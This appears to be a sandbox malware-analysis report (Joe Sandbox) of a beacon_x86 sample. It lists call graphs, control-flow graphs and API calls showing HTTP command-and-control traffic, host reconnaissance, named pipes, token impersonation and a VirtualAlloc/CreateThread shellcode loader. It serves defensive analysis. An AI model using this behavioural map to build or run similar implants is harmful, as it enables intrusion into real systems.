21240 d6ff39 21233->21240 21243 d6fd49 ___DllMainCRTStartup 21233->21243 21234 d6fe41 21235 d6fe4e 21234->21235 21236 d6fe59 21234->21236 21237 d77722 ___wtomb_environ 45 API calls 21235->21237 21238 d77722 ___wtomb_environ 45 API calls 21236->21238 21237->21243 21238->21243 21239->21243 21263 d70e70 45 API calls 3 library calls 21239->21263 21240->21243 21264 d70e70 45 API calls 3 library calls 21240->21264 21243->21152 21246 d701b5 ___DllMainCRTStartup 21244->21246 21245 d701d6 21245->21152 21246->21245 21289 d70f72 21246->21289 21248->21152 21250 d709a9 21249->21250 21251 d6fd29 21249->21251 21250->21251 21265 d72ef7 21250->21265 21251->21243 21253 d85990 21251->21253 21268 d8511c 21253->21268 21255 d859aa 21259 d6fd40 21255->21259 21281 d79641 45 API calls __getptd_noexit 21255->21281 21257 d859bd 21257->21259 21282 d79641 45 API calls __getptd_noexit 21257->21282 21259->21243 21260 d70a0c 5 API calls ___DllMainCRTStartup 21259->21260 21260->21226 21261->21234 21262->21233 21263->21243 21264->21243 21266 d777ff _malloc 45 API calls 21265->21266 21267 d72f03 21266->21267 21267->21250 21269 d85128 __locking 21268->21269 21270 d85140 21269->21270 21280 d8515f _memset 21269->21280 21283 d79641 45 API calls __getptd_noexit 21270->21283 21272 d85145 21284 d7b5da 4 API calls 2 library calls 21272->21284 21274 d851d1 RtlAllocateHeap 21274->21280 21277 d85155 __locking 21277->21255 21280->21274 21280->21277 21285 d798aa 45 API calls 2 library calls 21280->21285 21286 d7a0bc 5 API calls 2 library calls 21280->21286 21287 d85218 RtlLeaveCriticalSection _doexit 21280->21287 21288 d7a77f Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __decode_pointer 21280->21288 21281->21257 21282->21259 21283->21272 21285->21280 21286->21280 21287->21280 21288->21280 21290 d70f7f ___DllMainCRTStartup 21289->21290 21291 d70fa2 21290->21291 21293 d70165 21290->21293 21291->21245 21294 d6dfea ___DllMainCRTStartup 3 API calls 21293->21294 21295 d70173 21294->21295 21295->21291 21297 d6ced1 21296->21297 21298 d6cecb RevertToSelf 21296->21298 21297->20971 21298->21297 21300 d6185d 21299->21300 21301 d6ceec ImpersonateLoggedOnUser 21299->21301 21300->20846 21301->21300 21303 d61c85 _memset 21302->21303 21337 d68c49 21303->21337 21305 d61c95 21306 d77956 __snprintf 73 API calls 21305->21306 21307 d61cac ___DllMainCRTStartup 21306->21307 21308 d61d01 21307->21308 21355 d64eec 73 API calls 4 library calls 21307->21355 21312 d61d2d 21308->21312 21313 d61d1d 21308->21313 21310 d61ceb 21356 d64fb6 73 API calls 4 library calls 21310->21356 21315 d77956 __snprintf 73 API calls 21312->21315 21314 d77956 __snprintf 73 API calls 21313->21314 21316 d61d28 ___DllMainCRTStartup 21314->21316 21315->21316 21317 d61d62 HttpOpenRequestA 21316->21317 21341 d618bc 21317->21341 21325 d61dab 21327 d61dae InternetCloseHandle 21325->21327 21326 d61db9 InternetQueryDataAvailable 21328 d61e2e InternetCloseHandle 21326->21328 21329 d61dca 21326->21329 21330 d61e2a 21327->21330 21328->21330 21329->21328 21333 d61dd2 21329->21333 21330->20982 21331 d61ddb InternetReadFile 21332 d61e08 21331->21332 21331->21333 21332->21325 21334 d61e0d InternetCloseHandle 21332->21334 21333->21325 21333->21327 21333->21331 21333->21332 21335 d61e1f ___DllMainCRTStartup 21334->21335 21357 d68afe 45 API calls 3 library calls 21335->21357 21338 d68c58 21337->21338 21339 d671bc ___DllMainCRTStartup 45 API calls 21338->21339 21340 d68c6f ___DllMainCRTStartup 21339->21340 21340->21305 21342 d618c9 ___DllMainCRTStartup 21341->21342 21343 d618ff ___DllMainCRTStartup 21342->21343 21344 d618cd InternetQueryOptionA InternetSetOptionA 21342->21344 21345 d6190b InternetSetStatusCallback 21343->21345 21346 d61919 HttpSendRequestA 21343->21346 21344->21343 21345->21346 21347 d68cc6 21346->21347 21348 d67207 ___DllMainCRTStartup 45 API calls 21347->21348 21349 d61da0 21348->21349 21350 d6191b HttpQueryInfoA 21349->21350 21351 d61947 21350->21351 21352 d61949 21350->21352 21351->21325 21351->21326 21358 d77be9 53 API calls __wcstoi64 21352->21358 21355->21310 21356->21308 21357->21330 21360 d67da4 21359->21360 21379 d67b43 21359->21379 21360->20987 21361 d67b52 htonl select 21362 d67bca __WSAFDIsSet 21361->21362 21361->21379 21363 d67be1 accept ioctlsocket 21362->21363 21362->21379 21365 d67da6 closesocket 21363->21365 21386 d67c0b ___DllMainCRTStartup 21363->21386 21364 d67c7f __WSAFDIsSet 21366 d67c96 accept 21364->21366 21364->21379 21365->21360 21403 d66e11 ioctlsocket 21366->21403 21367 d67ce4 __WSAFDIsSet 21371 d67cf1 __WSAFDIsSet 21367->21371 21367->21379 21368 d67d0b __WSAFDIsSet 21369 d67d14 __WSAFDIsSet 21368->21369 21368->21379 21372 d67d27 __WSAFDIsSet 21369->21372 21369->21379 21373 d67d75 GetTickCount 21371->21373 21371->21379 21372->21373 21374 d67d3a accept 21372->21374 21373->21379 21378 d67d54 21374->21378 21405 d602d0 98 API calls ___DllMainCRTStartup 21378->21405 21379->21360 21379->21361 21379->21364 21379->21367 21379->21368 21404 d665e5 98 API calls 3 library calls 21379->21404 21406 d602d0 98 API calls ___DllMainCRTStartup 21379->21406 21382 d67d68 closesocket 21382->21379 21383 d6071b htonl ___DllMainCRTStartup 21383->21386 21386->21379 21386->21383 21399 d67520 46 API calls _malloc 21386->21399 21400 d606cb 45 API calls 2 library calls 21386->21400 21401 d602d0 98 API calls ___DllMainCRTStartup 21386->21401 21402 d60864 45 API calls 2 library calls 21386->21402 21388 d67e70 21387->21388 21391 d67e7a 21387->21391 21389 d777ff _malloc 45 API calls 21388->21389 21389->21391 21390 d67f99 21390->20987 21391->21390 21392 d67ea1 htonl recvfrom 21391->21392 21393 d67f0e htonl ioctlsocket 21391->21393 21395 d67f40 21391->21395 21396 d602d0 98 API calls ___DllMainCRTStartup 21391->21396 21392->21391 21394 d67edb WSAGetLastError 21392->21394 21393->21391 21394->21391 21395->21391 21407 d674d4 recv shutdown closesocket 21395->21407 21396->21391 21398->20990 21399->21386 21400->21386 21401->21386 21402->21386 21403->21379 21404->21379 21405->21382 21406->21379 21407->21395 21409 d64662 21408->21409 21417 d6469d 21408->21417 21411 d777ff _malloc 45 API calls 21409->21411 21413 d64669 21411->21413 21414 d6da37 ___DllMainCRTStartup 50 API calls 21413->21414 21415 d6467a ___DllMainCRTStartup 21414->21415 21416 d6dfea ___DllMainCRTStartup 3 API calls 21415->21416 21416->21417 21423 d6dbe5 21417->21423 21418 3e00000 21419 3e0000d Sleep 21418->21419 21421 3e000a9 21419->21421 21421->21002 21422->21000 21425 d6dbf5 21423->21425 21424 d644d5 21424->21418 21425->21424 21426 d6dc26 21425->21426 21427 d77722 ___wtomb_environ 45 API calls 21425->21427 21428 d777ff _malloc 45 API calls 21426->21428 21427->21426 21428->21424 21495 d68dc2 htonl 21496 d87dc0 GetSystemTimeAsFileTime ___inittime 21592 401e35 12 API calls 21593 d68fc8 107 API calls 21498 401160 34 API calls 21594 d66bf4 FlushFileBuffers 21596 d67ffe 107 API calls ___DllMainCRTStartup 21499 d66dfc recv WSAGetLastError Sleep 21598 d68ffa 77 API calls 21501 d68dfb 100 API calls 21502 d68dee 77 API calls 21503 40215d signal signal signal signal 21504 401500 _onexit 21505 d68d92 107 API calls 21603 401b0b 7 API calls 21604 d68f9a 116 API calls 21508 402110 8 API calls 21509 d69184 101 API calls 21510 401114 __getmainargs 21511 d60982 104 API calls 3 library calls 21512 d68d82 110 API calls 21605 d68f8a 122 API calls 21514 d68db2 10 API calls 21516 d7c5bd TlsAlloc 21608 402330 calloc EnterCriticalSection LeaveCriticalSection 21611 d66ba5 WriteFile 21518 d66da2 send 21519 d68da2 6 API calls 21613 d68faa 101 API calls 20579 4013c1 20580 4013c8 20579->20580 20581 4011da 20580->20581 20582 4013db _amsg_exit 20580->20582 20583 401460 _initterm 20581->20583 20584 4011e7 20581->20584 20585 4013f5 _initterm 20582->20585 20588 4011ff 20582->20588 20586 401483 exit 20583->20586 20584->20585 20584->20588 20585->20588 20605 401e20 20588->20605 20589 401231 SetUnhandledExceptionFilter 20591 401252 20589->20591 20592 401257 __p__acmdln 20591->20592 20595 40126e malloc 20592->20595 20594 401301 20596 401310 strlen malloc memcpy 20594->20596 20595->20586 20595->20594 20596->20596 20597 401346 20596->20597 20620 401960 20597->20620 20599 40135f 20625 4029e0 20599->20625 20610 401e35 20605->20610 20617 401e40 20605->20617 20606 402030 20607 402041 20606->20607 20606->20610 20613 401f9d 20607->20613 20631 401ce0 11 API calls 20607->20631 20608 402082 20632 401c80 11 API calls 20608->20632 20610->20589 20612 402092 20612->20589 20618 401fa0 20613->20618 20614 401ed0 20614->20606 20614->20613 20615 401ce0 11 API calls 20614->20615 20614->20617 20630 401c80 11 API calls 20614->20630 20615->20614 20617->20606 20617->20608 20617->20610 20617->20614 20617->20618 20618->20610 20619 401fd2 VirtualProtect 20618->20619 20619->20618 20621 401900 20620->20621 20622 401969 20620->20622 20633 4014e0 _onexit 20621->20633 20622->20599 20624 401930 20624->20599 20626 401960 _onexit 20625->20626 20627 4029f6 20626->20627 20634 401805 GetTickCount sprintf CreateThread 20627->20634 20630->20617 20631->20607 20632->20612 20633->20624 20635 4016e1 20634->20635 20638 40161c CreateNamedPipeA 20635->20638 20639 401682 ConnectNamedPipe 20638->20639 20640 4016d9 20638->20640 20639->20640 20641 401699 20639->20641 20642 4016c4 CloseHandle 20641->20642 20643 40169d WriteFile 20641->20643 20642->20640 20643->20642 20644 4016d0 20643->20644 20644->20641 21614 d66b52 ReadFile ___DllMainCRTStartup 21520 d68d50 110 API calls 21616 d68f5a 99 API calls 21522 d7055a 50 API calls 21618 d61346 126 API calls ___DllMainCRTStartup 21619 d6fb45 5 API calls 3 library calls 21525 d6dd4f 51 API calls 21526 d66d4d recv 21620 d68f4a 47 API calls 21527 d86945 19 API calls ___DllMainCRTStartup 21622 d68f7a 112 API calls 21624 401bf0 fprintf 21531 d69160 htonl htonl htonl htonl 21532 d68d60 127 API calls 21533 d6356f CryptGenRandom CryptReleaseContext GetSystemTimeAsFileTime ___DllMainCRTStartup 21535 d6916a 101 API calls 21625 d68f6a 81 API calls 21538 d63112 8 API calls 2 library calls 21540 d66507 45 API calls 2 library calls 21541 d68cfd 156 API calls 21628 d66303 110 API calls 2 library calls 21629 d60b09 53 API calls ___DllMainCRTStartup 21542 4011a3 33 API calls 21630 4023a5 EnterCriticalSection free LeaveCriticalSection 21543 d68cfd 107 API calls 21545 d6913f 115 API calls 21429 4017ac malloc 21430 4017c2 Sleep 21429->21430 21436 401700 CreateFileA 21430->21436 21433 4017e5 21441 40156c VirtualAlloc 21433->21441 21435 4017fe 21437 4017a4 21436->21437 21438 40175f 21436->21438 21437->21430 21437->21433 21439 401763 ReadFile 21438->21439 21440 40178a CloseHandle 21438->21440 21439->21438 21439->21440 21440->21437 21442 40159f 21441->21442 21443 4015c2 VirtualProtect CreateThread 21442->21443 21443->21435 21444 401530 21443->21444 21632 d68f3a 105 API calls 21546 4025b0 strlen strncmp 21633 d68f26 111 API calls 21547 d68d2e SetCurrentDirectoryA 21635 d85320 75 API calls 5 library calls

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1 40116c-40118a 2 401430-40143c GetStartupInfoA 1->2 3 401190-4011a1 1->3 4 4011bc-4011c8 3->4 5 4011a8-4011aa 4->5 6 4011ca-4011d4 4->6 9 4011b0-4011b9 Sleep 5->9 10 4013c8-4013d5 5->10 7 4011da-4011e1 6->7 8 4013db-4013ef _amsg_exit 6->8 11 401460-401479 _initterm 7->11 12 4011e7-4011f9 7->12 13 4013f5-401415 _initterm 8->13 14 4011ff-401201 8->14 9->4 10->7 10->8 19 401483 11->19 12->13 12->14 15 401207-40120e 13->15 16 40141b-401421 13->16 14->15 14->16 17 401210-401229 15->17 18 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 15->18 16->15 17->18 28 401281-401287 18->28 29 40126e 18->29 23 40148b-40149a exit 19->23 31 401270-401272 28->31 32 401289-401294 28->32 30 4012bd-4012c5 29->30 34 4012c7-4012d0 30->34 35 4012db-4012fb malloc 30->35 36 401274-401277 31->36 37 4012b8 31->37 33 40127e 32->33 33->28 38 4012d6 34->38 39 4013b8-4013bc 34->39 35->19 40 401301-40130d 35->40 41 4012a0-4012a2 36->41 42 401279 36->42 37->30 38->35 39->38 44 401310-401344 strlen malloc memcpy 40->44 41->37 43 4012a4 41->43 42->33 45 4012a8-4012b1 43->45 44->44 46 401346-401393 call 401960 call 4029e0 44->46 45->37 47 4012b3-4012b6 45->47 46->23 52 401399-4013a1 46->52 47->37 47->45 53 4013a7-4013b2 52->53 54 401448-40145d _cexit 52->54
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
          • String ID:
          • API String ID: 1672962128-0
          • Opcode ID: 403f90f316b1dd4bb9580ff5369489e89610e9102d5ba99587d81e0cd643e45f
          • Instruction ID: cd1cdbe7929d0bdf955f1aec1ac9dc0fa1fb6e5342f4dd5585025b5f235b2fbc
          • Opcode Fuzzy Hash: 403f90f316b1dd4bb9580ff5369489e89610e9102d5ba99587d81e0cd643e45f
          • Instruction Fuzzy Hash: 13817BB5A043058FDB10DF69E98476E77E0FB49305F00443EEA84AB3A2D779D845CB8A

          Control-flow Graph

          APIs
          • _memset.LIBCMT ref: 00D61C80
          • __snprintf.LIBCMT ref: 00D61CA7
            • Part of subcall function 00D685F6: _memset.LIBCMT ref: 00D68617
          • __snprintf.LIBCMT ref: 00D61D23
          • __snprintf.LIBCMT ref: 00D61D3A
          • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00D90540,00D9EFC4), ref: 00D61D69
          • HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 00D61D92
          • InternetCloseHandle.WININET(00000000), ref: 00D61DAF
            • Part of subcall function 00D64EEC: _memset.LIBCMT ref: 00D64EFC
            • Part of subcall function 00D64EEC: _memset.LIBCMT ref: 00D64F08
            • Part of subcall function 00D64EEC: __snprintf.LIBCMT ref: 00D64F59
            • Part of subcall function 00D64EEC: _memset.LIBCMT ref: 00D64F90
            • Part of subcall function 00D64EEC: _memset.LIBCMT ref: 00D64F9B
            • Part of subcall function 00D64FB6: _memset.LIBCMT ref: 00D64FC6
            • Part of subcall function 00D64FB6: _memset.LIBCMT ref: 00D64FD2
            • Part of subcall function 00D64FB6: __snprintf.LIBCMT ref: 00D6502E
            • Part of subcall function 00D64FB6: _memset.LIBCMT ref: 00D6504C
            • Part of subcall function 00D64FB6: _memset.LIBCMT ref: 00D65057
          • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000), ref: 00D61DC0
          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00D61DEE
          • InternetCloseHandle.WININET(00000000), ref: 00D61E0E
          • InternetCloseHandle.WININET(00000000), ref: 00D61E2F
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _memset$Internet__snprintf$CloseHandle$HttpRequest$AvailableDataFileOpenQueryReadSend
          • String ID:
          • API String ID: 2172916581-0
          • Opcode ID: d48334b5bd3b3e3fab214b5022b64094c29907015d3934fe2cb822df40069d5d
          • Instruction ID: 30aaeb06961bf1a6a352b22a412fafcac4f8d1b70054e997ab50c31d5dc2e8c6
          • Opcode Fuzzy Hash: d48334b5bd3b3e3fab214b5022b64094c29907015d3934fe2cb822df40069d5d
          • Instruction Fuzzy Hash: 4D519C76900219BFDF11AFA8DC85EAE7BBCEF04310B084066FA14E72A1DB3199449B71

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 108 4013c1-4013d5 110 4011da-4011e1 108->110 111 4013db-4013ef _amsg_exit 108->111 112 401460-401479 _initterm 110->112 113 4011e7-4011f9 110->113 114 4013f5-401415 _initterm 111->114 115 4011ff-401201 111->115 120 401483 112->120 113->114 113->115 116 401207-40120e 114->116 117 40141b-401421 114->117 115->116 115->117 118 401210-401229 116->118 119 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 116->119 117->116 118->119 129 401281-401287 119->129 130 40126e 119->130 124 40148b-40149a exit 120->124 132 401270-401272 129->132 133 401289-401294 129->133 131 4012bd-4012c5 130->131 135 4012c7-4012d0 131->135 136 4012db-4012fb malloc 131->136 137 401274-401277 132->137 138 4012b8 132->138 134 40127e 133->134 134->129 139 4012d6 135->139 140 4013b8-4013bc 135->140 136->120 141 401301-40130d 136->141 142 4012a0-4012a2 137->142 143 401279 137->143 138->131 139->136 140->139 145 401310-401344 strlen malloc memcpy 141->145 142->138 144 4012a4 142->144 143->134 146 4012a8-4012b1 144->146 145->145 147 401346-401381 call 401960 call 4029e0 145->147 146->138 148 4012b3-4012b6 146->148 152 401386-401393 147->152 148->138 148->146 152->124 153 401399-4013a1 152->153 154 4013a7-4013b2 153->154 155 401448-40145d _cexit 153->155
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
          • String ID:
          • API String ID: 2053141405-0
          • Opcode ID: 03f94abf2d86f45a5c2415d1c739ceeb502182650b68f8019ac87a932fbe833c
          • Instruction ID: 176527dceee54676b3400d832f202c7b1996cfd354b1dcf2f579e8dd7b9a5ba8
          • Opcode Fuzzy Hash: 03f94abf2d86f45a5c2415d1c739ceeb502182650b68f8019ac87a932fbe833c
          • Instruction Fuzzy Hash: 974118B4A043058FDB10EF65E98575EBBE0FB48705F10843EE984A73A2D7B8D845CB59

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 156 4011a3-4011a7 157 4011a8-4011aa 156->157 158 4011b0-4011c8 Sleep 157->158 159 4013c8-4013d5 157->159 158->157 163 4011ca-4011d4 158->163 160 4011da-4011e1 159->160 161 4013db-4013ef _amsg_exit 159->161 164 401460-401479 _initterm 160->164 165 4011e7-4011f9 160->165 166 4013f5-401415 _initterm 161->166 167 4011ff-401201 161->167 163->160 163->161 172 401483 164->172 165->166 165->167 168 401207-40120e 166->168 169 40141b-401421 166->169 167->168 167->169 170 401210-401229 168->170 171 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 168->171 169->168 170->171 181 401281-401287 171->181 182 40126e 171->182 176 40148b-40149a exit 172->176 184 401270-401272 181->184 185 401289-401294 181->185 183 4012bd-4012c5 182->183 187 4012c7-4012d0 183->187 188 4012db-4012fb malloc 183->188 189 401274-401277 184->189 190 4012b8 184->190 186 40127e 185->186 186->181 191 4012d6 187->191 192 4013b8-4013bc 187->192 188->172 193 401301-40130d 188->193 194 4012a0-4012a2 189->194 195 401279 189->195 190->183 191->188 192->191 197 401310-401344 strlen malloc memcpy 193->197 194->190 196 4012a4 194->196 195->186 198 4012a8-4012b1 196->198 197->197 199 401346-401393 call 401960 call 4029e0 197->199 198->190 200 4012b3-4012b6 198->200 199->176 205 401399-4013a1 199->205 200->190 200->198 206 4013a7-4013b2 205->206 207 401448-40145d _cexit 205->207
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
          • String ID:
          • API String ID: 2230096795-0
          • Opcode ID: 85e1cf29ecf6396504c26cb88095de616834151ce1f924ca111f46e639445432
          • Instruction ID: ee64299d2f4f8c50c0c592fa26e83c8470f2d6fe6e7dfb634f206cb54a3f681e
          • Opcode Fuzzy Hash: 85e1cf29ecf6396504c26cb88095de616834151ce1f924ca111f46e639445432
          • Instruction Fuzzy Hash: 7F4107B4A043058FDB10DF69E98471EBBE0BB48705F14453EE988A73A2D778D845CB99

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 208 401160-40118a 210 401430-40143c GetStartupInfoA 208->210 211 401190-4011a1 208->211 212 4011bc-4011c8 211->212 213 4011a8-4011aa 212->213 214 4011ca-4011d4 212->214 217 4011b0-4011b9 Sleep 213->217 218 4013c8-4013d5 213->218 215 4011da-4011e1 214->215 216 4013db-4013ef _amsg_exit 214->216 219 401460-401479 _initterm 215->219 220 4011e7-4011f9 215->220 221 4013f5-401415 _initterm 216->221 222 4011ff-401201 216->222 217->212 218->215 218->216 227 401483 219->227 220->221 220->222 223 401207-40120e 221->223 224 40141b-401421 221->224 222->223 222->224 225 401210-401229 223->225 226 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 223->226 224->223 225->226 236 401281-401287 226->236 237 40126e 226->237 231 40148b-40149a exit 227->231 239 401270-401272 236->239 240 401289-401294 236->240 238 4012bd-4012c5 237->238 242 4012c7-4012d0 238->242 243 4012db-4012fb malloc 238->243 244 401274-401277 239->244 245 4012b8 239->245 241 40127e 240->241 241->236 246 4012d6 242->246 247 4013b8-4013bc 242->247 243->227 248 401301-40130d 243->248 249 4012a0-4012a2 244->249 250 401279 244->250 245->238 246->243 247->246 252 401310-401344 strlen malloc memcpy 248->252 249->245 251 4012a4 249->251 250->241 253 4012a8-4012b1 251->253 252->252 254 401346-401393 call 401960 call 4029e0 252->254 253->245 255 4012b3-4012b6 253->255 254->231 260 401399-4013a1 254->260 255->245 255->253 261 4013a7-4013b2 260->261 262 401448-40145d _cexit 260->262
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
          • String ID:
          • API String ID: 1672962128-0
          • Opcode ID: 8f109d0c8fcfb376cf6425773cd7d35a5131f80409148732b39be14af764f308
          • Instruction ID: 14d090d825811c9464361f5f824c2d109dd69b69c83bbf3de982eb4becc4467a
          • Opcode Fuzzy Hash: 8f109d0c8fcfb376cf6425773cd7d35a5131f80409148732b39be14af764f308
          • Instruction Fuzzy Hash: ED5168B5A043058FDB10DFA9E984B1ABBE0FB48705F10453EE944AB3A2D778D845CB99

          Control-flow Graph

          APIs
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
          • GetUserNameA.ADVAPI32(?,?), ref: 00D66F6E
          • GetComputerNameA.KERNEL32(?,?), ref: 00D66F7E
          • GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 00D66F92
          • _strrchr.LIBCMT ref: 00D66FA1
          • GetVersionExA.KERNEL32(00000000), ref: 00D66FBC
          • __snprintf.LIBCMT ref: 00D67028
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Name$_malloc$ComputerFileModuleUserVersion__snprintf_strrchr
          • String ID:
          • API String ID: 1877169212-0
          • Opcode ID: 0f34eb6ab475cdb4d2de8fe6e6a275d5784b2428fd9c90481d2eb31468510aaa
          • Instruction ID: 1241ad72e6cbc34bcce63733562af70db8b04f40939db6cf542a2117c23c1a0c
          • Opcode Fuzzy Hash: 0f34eb6ab475cdb4d2de8fe6e6a275d5784b2428fd9c90481d2eb31468510aaa
          • Instruction Fuzzy Hash: 5041BC75D00209AFDF11AFA5EC4ADBEBFB4EF04300F14405AF900A6292EB759A50AB70

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 608 40161c-401680 CreateNamedPipeA 609 401682-401697 ConnectNamedPipe 608->609 610 4016d9-4016e0 608->610 609->610 611 401699-40169b 609->611 612 4016c4-4016ce CloseHandle 611->612 613 40169d-4016c2 WriteFile 611->613 612->610 613->612 614 4016d0-4016d7 613->614 614->611
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
          • String ID:
          • API String ID: 2239253087-0
          • Opcode ID: 588faa4c15bb17f6641a11f41d94c7d67e31f3f64e51a70bffe85c2206670ea5
          • Instruction ID: 647ba10e4562674360e559436f846850fae7207d816ad69ae546ddef800915d1
          • Opcode Fuzzy Hash: 588faa4c15bb17f6641a11f41d94c7d67e31f3f64e51a70bffe85c2206670ea5
          • Instruction Fuzzy Hash: C1114CB0804305AFD7109F66C84836FBBF8EB84359F00892EE895973A1D37AC4488F96

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 615 d6df82-d6dfa9 617 d6dfc2-d6dfd5 CryptGenRandom 615->617 618 d6dfab-d6dfbc 615->618 619 d6dfe6-d6dfe8 617->619 620 d6dfd7-d6dfe4 CryptReleaseContext 617->620 618->617 622 d6dfbe-d6dfc1 618->622 619->620 620->622
          APIs
          • CryptGenRandom.ADVAPI32(00000000,?,?,?,00D9EFEC,?,?,00D6DFF8,?,?,?,00D6469D,00D9EFEC,0000000D,00000000,0000001C), ref: 00D6DFCC
          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00D9EFEC,?,?,00D6DFF8,?,?,?,00D6469D,00D9EFEC,0000000D,00000000,0000001C,00000001), ref: 00D6DFDC
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Crypt$ContextRandomRelease
          • String ID: Microsoft Base Cryptographic Provider v1.0
          • API String ID: 3163166064-291530887
          • Opcode ID: 6298e278e507f0f3f167548c9fb139467626c16076945c46857cd9897571e720
          • Instruction ID: cd94c8d16a3e823f2cbb4fec3f25dfee6c080012e0783fd790f64da3f61d6022
